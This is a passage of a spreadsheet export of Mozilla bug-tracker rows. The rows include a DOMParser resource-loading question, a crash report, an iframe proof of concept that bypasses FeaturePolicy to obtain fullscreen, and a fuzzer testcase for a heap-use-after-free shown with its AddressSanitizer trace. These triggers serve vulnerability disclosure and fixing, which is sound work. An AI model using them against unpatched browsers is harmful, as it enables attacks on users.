        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N852" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O852" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P852" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q852" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R852" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S852" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T852" t="n">
        <v>1</v>
      </c>
      <c r="U852" t="n">
        <v>1</v>
      </c>
      <c r="V852" t="n">
        <v>35</v>
      </c>
      <c r="W852" t="inlineStr">
        <is>
          <t>If DOMParser parses HTML string to DOM, should not it omit not only script processing but also recourse loading (as the pure XHR does with responseType = "document")?
I run this code from JavaScript Editor (Scratchpad, in browser context):
var parser = new DOMParser();
var xhr = new XMLHttpRequest();
xhr.mozBackgroundRequest = true;
xhr.open("GET", "https://addons.mozilla.org/en-US/firefox/", true);
xhr.timeout = 10000;
xhr.channel.loadFlags |= Components.interfaces.nsIRequest.LOAD_BYPASS_CACHE;
xhr.onload = function() {
	var doc = parser.parseFromString(this.responseText, "text/html");
	var title = doc.evaluate("//title", doc, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null).singleNodeValue;
	if (title) {
		alert(title.textContent);
	}
	else {
		alert("Parsing error");
	}
}
xhr.ontimeout = function() {
	alert("Timeout");
}
xhr.onerror = function() {
	alert("HTTP error");
}
xhr.send(null);
HttpFox (https://addons.mozilla.org/ru/firefox/addon/httpfox/) shows additional recourse loading. Here some HTTP logs for three sites:
Started, Time, Sent, Received, Method, Result, Type, URL
https://addons.mozilla.org/en-US/firefox/
00:00:01.221	1.197	603		316		GET	200		text/html	https://addons.mozilla.org/en-US/firefox/
00:00:02.492	0.171	332		(34312)	GET	(Cache)	text/css	https://static-ssl-cdn.addons.mozilla.net/media/css/zamboni/impala-min.css?build=2628081
00:00:02.548	0.143	321		(824)	GET	(Cache)	text/css	https://static-ssl-cdn.addons.mozilla.net/media/css/impala/nojs.css?b=78073c4
00:00:02.618	0.464	968		201		GET	303		Redirect to: /dcso6de4r0000082npfcmh4rf_4b1e/njs.gif?dcsredirect=108&amp;dcstlh=1298194945&amp;dcstlv=1298194945&amp;dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.2	https://statse.webtrendslive.com/dcso6de4r0000082npfcmh4rf_4b1e/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.2
00:00:03.383	0.622	1050	327		GET	200		image/gif	https://statse.webtrendslive.com/dcso6de4r0000082npfcmh4rf_4b1e/njs.gif?dcsredirect=108&amp;dcstlh=1298194945&amp;dcstlv=1298194945&amp;dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.2
http://www.urbandictionary.com/
00:00:02.218	0.163	893	6678	GET	200		text/html	http://www.urbandictionary.com/
00:00:02.470	0.582	844	21059	GET	200		text/css	http://static2.urbandictionary.com/rel-30747e0/assets/base-datauri.css
00:00:02.527	0.487	859	8094	GET	200		image/png	http://static0.urbandictionary.com/rel-30747e0/images/logo-holiday.png
00:00:02.581	0.461	864	613		GET	200		image/gif	http://static2.urbandictionary.com/rel-30747e0/images/left_browse_arrow.gif
00:00:02.639	0.377	865	613		GET	200		image/gif	http://static1.urbandictionary.com/rel-30747e0/images/right_browse_arrow.gif
00:00:02.698	0.112	853	(165)	GET	(Cache)	image/gif	http://static1.urbandictionary.com/rel-30747e0/images/quotes.gif
00:00:02.756	0.324	352	231		GET	200		image/gif	http://pixel.quantserve.com/pixel/p-77H27_lnOeCCI.gif
http://www.imdb.com/
00:00:18.897	0.283	1433	243		GET	200		text/html	http://www.imdb.com/
00:00:19.236	0.339	335		(28286)	GET	(Cache)	text/css	http://i.media-imdb.com/images/SF3997b2af7161e82df725bc7ca86f84ce/css/min/consumerhome.css
00:00:19.290	0.448	597		188		GET	302		Redirect to: http://s0.2mdn.net/viewad/817-grey.gif	http://ad.doubleclick.net/ad/imdb2.consumer.homepage/;tile=2;sz=1008x150,1008x200,1008x30,9x1;p=t;p=top;ct=com;bpx=1;ab=a;ka=0;ord=717635184750?
00:00:19.344	0.261	346		(96)	GET	(Cache)	text/css	http://i.media-imdb.com/images/SF52e6b9f11712d3ec552179f6c869b63a/css2/site/consumer-navbar-no-js.css
00:00:19.396	0.340	582		188		GET	302		Redirect to: http://s0.2mdn.net/viewad/817-grey.gif	http://ad.doubleclick.net/ad/imdb2.consumer.homepage/;tile=5;sz=1008x60,1008x66,7x1;p=ns;ct=com;bpx=1;ab=a;ka=0;ord=717635184750?
00:00:19.449	0.288	580		188		GET	302		Redirect to: http://s0.2mdn.net/viewad/817-grey.gif	http://ad.doubleclick.net/ad/imdb2.consumer.homepage/;tile=3;sz=300x250,11x1;p=tr;p=tc;ct=com;bpx=1;ab=a;ka=0;ord=717635184750?
00:00:19.504	0.146	425		220		GET	200		image/gif	http://b.scorecardresearch.com/p?c1=2&amp;c2=6034961&amp;c3=&amp;c4=http%3A%2F%2Fwww.imdb.com%2F&amp;c5=c6=&amp;15=&amp;cj=1
00:00:19.899	0.418	328		(43)	GET	(Cache)	image/gif	http://s0.2mdn.net/viewad/817-grey.gif
00:00:19.957	0.362	328		(43)	GET	(Cache)	image/gif	http://s0.2mdn.net/viewad/817-grey.gif
00:00:20.015	0.305	328	(	43)		GET	(Cache)	image/gif	http://s0.2mdn.net/viewad/817-grey.gif
Why DOMParser needs these files for just DOM parsing?</t>
        </is>
      </c>
      <c r="X852" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="853">
      <c r="A853" t="n">
        <v>1295033</v>
      </c>
      <c r="B853" t="inlineStr">
        <is>
          <t>2016-08-14 07:59:42 -0700</t>
        </is>
      </c>
      <c r="C853" t="inlineStr">
        <is>
          <t>Crash in nsXPCWrappedJS::nsXPCWrappedJS</t>
        </is>
      </c>
      <c r="D853" t="inlineStr">
        <is>
          <t>2017-01-09 08:27:14 -0800</t>
        </is>
      </c>
      <c r="E853" t="n">
        <v>1</v>
      </c>
      <c r="F853" t="n">
        <v>1</v>
      </c>
      <c r="G853" t="n">
        <v>3</v>
      </c>
      <c r="H853" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I853" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J853" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K853" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L853" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M853" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N853" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O853" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P853" t="inlineStr"/>
      <c r="Q853" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R853" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S853" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T853" t="n">
        <v>1</v>
      </c>
      <c r="U853" t="n">
        <v>0</v>
      </c>
      <c r="V853" t="n">
        <v>67</v>
      </c>
      <c r="W853" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-74fc5f2a-51f9-4552-b25d-adc782160814.
=============================================================
Crash seen in early betas that has risen to #10 in Beta 3. Since it has no bug associated with it, filing to get it on the radar for tracking: http://bit.ly/2aLJ9PR.
Perhaps terrence has some ideas as to what might be the root cause, adding ni.</t>
        </is>
      </c>
      <c r="X853" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="854">
      <c r="A854" t="n">
        <v>1782211</v>
      </c>
      <c r="B854" t="inlineStr">
        <is>
          <t>2022-07-29 04:13:52 -0700</t>
        </is>
      </c>
      <c r="C854" t="inlineStr">
        <is>
          <t>Uninitialized FeaturePolicy in transient about:blank</t>
        </is>
      </c>
      <c r="D854" t="inlineStr">
        <is>
          <t>2024-05-30 10:58:17 -0700</t>
        </is>
      </c>
      <c r="E854" t="n">
        <v>1</v>
      </c>
      <c r="F854" t="n">
        <v>1</v>
      </c>
      <c r="G854" t="n">
        <v>3</v>
      </c>
      <c r="H854" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I854" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J854" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K854" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L854" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M854" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N854" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O854" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P854" t="inlineStr">
        <is>
          <t>[adv-main105+][adv-esr102.3+]</t>
        </is>
      </c>
      <c r="Q854" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R854" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S854" t="inlineStr">
        <is>
          <t>106 Branch</t>
        </is>
      </c>
      <c r="T854" t="n">
        <v>1</v>
      </c>
      <c r="U854" t="n">
        <v>0</v>
      </c>
      <c r="V854" t="n">
        <v>14</v>
      </c>
      <c r="W854" t="inlineStr">
        <is>
          <t>A transient placeholder `about:blank` document never initializes its FeaturePolicy. This can be used to bypass feature restrictions with the same attack scenarios and impact as bug 1771685. 
The bug occurs because a transient `about:blank` doesn't call [`Document::StartDocumentLoad()`](https://searchfox.org/mozilla-central/rev/4a15041348e08fb0d6f5726015c32861e663fbfe/dom/base/Document.cpp#3559) where the policy would usually be set up. The FP also isn't among the security properties that are explicitly initialized in [`nsDocShell::CreateAboutBlankContentViewer()`](https://searchfox.org/mozilla-central/rev/4a15041348e08fb0d6f5726015c32861e663fbfe/docshell/base/nsDocShell.cpp#6736-6778).
### Proof of concept
This iframe contains two blank sub frames, one of which is stopped immediately with `window.stop()`, so it never starts loading to replace the initial transient `about:blank`. Thus, the document holds an unrestricted FeaturePolicy and can hijack the top-level context's fullscreen permission, whereas the other frame has loaded regularly and is denied fullscreen as expected.
(I'm using `srcdoc` only to keep the PoC self-contained - the cross-origin examples from bug 1771685 apply here as well.)
```html
&lt;iframe allow="fullscreen 'none'" srcdoc="
  &lt;button onclick='regular.document.firstChild.requestFullscreen()'&gt;fullscreen regular&lt;/button&gt;
  &lt;button onclick='transient.document.firstChild.requestFullscreen()'&gt;fullscreen transient&lt;/button&gt;
  &lt;iframe name='regular'&gt;&lt;/iframe&gt;
  &lt;iframe name='transient'&gt;&lt;/iframe&gt;
  &lt;script&gt;transient.stop()&lt;/script&gt;
"&gt;&lt;/iframe&gt;
```
Also, sorry for reporting this right after the patch for bug 1771685 has already landed. When I filed that one I hadn't been aware there's another FeaturePolicy initialization bug.</t>
        </is>
      </c>
      <c r="X854" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="855">
      <c r="A855" t="n">
        <v>469565</v>
      </c>
      <c r="B855" t="inlineStr">
        <is>
          <t>2008-12-14 11:34:45 -0800</t>
        </is>
      </c>
      <c r="C855" t="inlineStr">
        <is>
          <t>Keygen Tag endless loop and (not always reproducable) Memory corruption [@ NSSRWLock_LockRead_Util]</t>
        </is>
      </c>
      <c r="D855" t="inlineStr">
        <is>
          <t>2016-05-11 16:34:17 -0700</t>
        </is>
      </c>
      <c r="E855" t="n">
        <v>1</v>
      </c>
      <c r="F855" t="n">
        <v>1</v>
      </c>
      <c r="G855" t="n">
        <v>3</v>
      </c>
      <c r="H855" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I855" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J855" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K855" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L855" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M855" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N855" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O855" t="inlineStr">
        <is>
          <t>WONTFIX</t>
        </is>
      </c>
      <c r="P855" t="inlineStr">
        <is>
          <t>[sg:dos] comment 0 hidden per comment 6</t>
        </is>
      </c>
      <c r="Q855" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R855" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S855" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T855" t="n">
        <v>1</v>
      </c>
      <c r="U855" t="n">
        <v>1</v>
      </c>
      <c r="V855" t="n">
        <v>34</v>
      </c>
      <c r="W855" t="inlineStr">
        <is>
          <t>ADDENDUM :
POSTED WRONG WINDEBUG CRASH REPORT.. Please ignore WINDBG output</t>
        </is>
      </c>
      <c r="X855" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="856">
      <c r="A856" t="n">
        <v>1287721</v>
      </c>
      <c r="B856" t="inlineStr">
        <is>
          <t>2016-07-19 02:02:34 -0700</t>
        </is>
      </c>
      <c r="C856" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::a11y::DocAccessible::ProcessInvalidationList</t>
        </is>
      </c>
      <c r="D856" t="inlineStr">
        <is>
          <t>2024-05-30 09:19:27 -0700</t>
        </is>
      </c>
      <c r="E856" t="n">
        <v>1</v>
      </c>
      <c r="F856" t="n">
        <v>1</v>
      </c>
      <c r="G856" t="n">
        <v>3</v>
      </c>
      <c r="H856" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I856" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J856" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K856" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L856" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M856" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N856" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O856" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P856" t="inlineStr">
        <is>
          <t>[adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q856" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R856" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S856" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T856" t="n">
        <v>1</v>
      </c>
      <c r="U856" t="n">
        <v>0</v>
      </c>
      <c r="V856" t="n">
        <v>27</v>
      </c>
      <c r="W856" t="inlineStr">
        <is>
          <t>The testcases crashes the latest ASAN build of Firefox (BuildID=20160718145619) as follows. Requires fuzzPriv extension to crash reliably.
&lt;script&gt;
function start() {
        o73=document.createElement('style');
        o165=document.createRange();
        o191=document.createElement('a');
        o73.appendChild(o191);
        o268=document.createElement('th');
        document.documentElement.style.display='grid';
        setTimeout(f1, 4);
}
function f1() {
        o539=document.head;
        document.documentElement.srcdoc='';
        document.documentElement.appendChild(o268);
        o635=o165.createContextualFragment('&lt;legend id="id28"&gt;');
        o191.appendChild(o635);
        setTimeout(f2, 4);
}
function f2() {
        o539.appendChild(o73);
        o268.setAttribute('aria-owns','id28');
        o191.textContent="ABC";
        fuzzPriv.CC();fuzzPriv.GC();
        location.reload();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
=================================================================
==23093==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d00003c198 at pc 0x7fc5caa02581 bp 0x7ffe4d64df80 sp 0x7ffe4d64df78
READ of size 8 at 0x60d00003c198 thread T0 (Web Content)
    #0 0x7fc5caa02580 in GetParentNode /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsINode.h:915:12
    #1 0x7fc5caa02580 in GetContainerAccessible /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/a11y/DocAccessible.h:281
    #2 0x7fc5caa02580 in mozilla::a11y::DocAccessible::ProcessInvalidationList() /builds/slave/m-cen-l64-asan-000000000000000/build/src/accessible/generic/DocAccessible.cpp:1358
    #3 0x7fc5ca978b83 in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/accessible/base/NotificationController.cpp:385:3
    #4 0x7fc5c9829416 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:1712:7
    #5 0x7fc5c98318b6 in DoTick /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:1398:5
    #6 0x7fc5c98318b6 in DoRefresh /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:2148
    #7 0x7fc5c98318b6 in nsRefreshDriver::FinishedWaitingForTransaction() /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:2000
    #8 0x7fc5c4d894c3 in mozilla::layers::ClientLayerManager::DidComposite(unsigned long, mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/layers/client/ClientLayerManager.cpp:421:5
    #9 0x7fc5c8ad1ea7 in mozilla::dom::TabChild::DidComposite(unsigned long, mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/ipc/TabChild.cpp:3054:3
    #10 0x7fc5c4e78aae in mozilla::layers::CompositorBridgeChild::RecvDidComposite(unsigned long const&amp;, unsigned long const&amp;, mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/layers/ipc/CompositorBridgeChild.cpp:484:7
    #11 0x7fc5c3fdb545 in mozilla::layers::PCompositorBridgeChild::OnMessageReceived(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/PCompositorBridgeChild.cpp:1383:20
    #12 0x7fc5c37aa517 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1658:14
    #13 0x7fc5c37a7356 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1596:17
    #14 0x7fc5c3795127 in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1563:5
    #15 0x7fc5c37c4ac2 in applyImpl&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:729:12
    #16 0x7fc5c37c4ac2 in apply&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:735
    #17 0x7fc5c37c4ac2 in mozilla::detail::RunnableMethodImpl&lt;bool (mozilla::ipc::MessageChannel::*)(), false, true&gt;::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:764
    #18 0x7fc5c37c40af in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:476:22
    #19 0x7fc5c37c40af in mozilla::ipc::MessageChannel::DequeueTask::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:495
    #20 0x7fc5c29e38c6 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:1068:7
    #21 0x7fc5c2a61cac in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #22 0x7fc5c37b187f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:100:21
    #23 0x7fc5c3726088 in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #24 0x7fc5c3726088 in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #25 0x7fc5c3726088 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #26 0x7fc5c91a8f6f in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #27 0x7fc5cb236fb7 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:829:12
    #28 0x7fc5c3726088 in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #29 0x7fc5c3726088 in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #30 0x7fc5c3726088 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #31 0x7fc5cb236653 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:659:7
    #32 0x4e2c35 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:224:19
    #33 0x7fc5bf47782f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #34 0x41e7e8 in _start (/home/nils/fuzzer3/firefox/plugin-container+0x41e7e8)
0x60d00003c198 is located 40 bytes inside of 136-byte region [0x60d00003c170,0x60d00003c1f8)
freed by thread T0 (Web Content) here:
    #0 0x4b4f3b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7fc5c28c2614 in SnowWhiteKiller::~SnowWhiteKiller() /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:2685:9
    #2 0x7fc5c28c2206 in nsCycleCollector::FreeSnowWhite(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:2859:3
    #3 0x7fc5c28c88c5 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:3841:3
    #4 0x7fc5c28c807c in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:3666:9
    #5 0x7fc5c28cb386 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:4160:3
    #6 0x7fc5c57bc429 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsJSEnvironment.cpp:1436:3
    #7 0x7fc5c534068d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsDOMWindowUtils.cpp:1307:3
    #8 0x7fc5c2a09436 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_x86_64_unix.cpp:180:23
    #9 0x7fc5c43c02f2 in Invoke /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2075:12
    #10 0x7fc5c43c02f2 in Call /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1394
    #11 0x7fc5c43c02f2 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1361
    #12 0x7fc5c43c745c in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1128:12
    #13 0x7fc5cd429f1b in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:232:15
    #14 0x7fc5cd429f1b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:441
    #15 0x7fc5cd410c33 in CallFromStack /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:504:12
    #16 0x7fc5cd410c33 in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2873
    #17 0x7fc5cd3f740e in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:399:12
    #18 0x7fc5cd42a5c0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:471:15
    #19 0x7fc5cd3da741 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:517:10
    #20 0x7fc5ccf5b368 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:2793:12
    #21 0x7fc5c42f9d45 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/xpconnect/src/ExportHelpers.cpp:353:18
    #22 0x7fc5cd429f1b in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:232:15
    #23 0x7fc5cd429f1b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:441
    #24 0x7fc5cd410c33 in CallFromStack /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:504:12
    #25 0x7fc5cd410c33 in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2873
    #26 0x7fc5cd3f740e in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:399:12
    #27 0x7fc5cd42a5c0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:471:15
    #28 0x7fc5cd3da741 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:517:10
    #29 0x7fc5ccf5d8b8 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:2852:12
    #30 0x7fc5c717588d in mozilla::dom::Function::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
    #31 0x7fc5c540a40f in Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:70:12
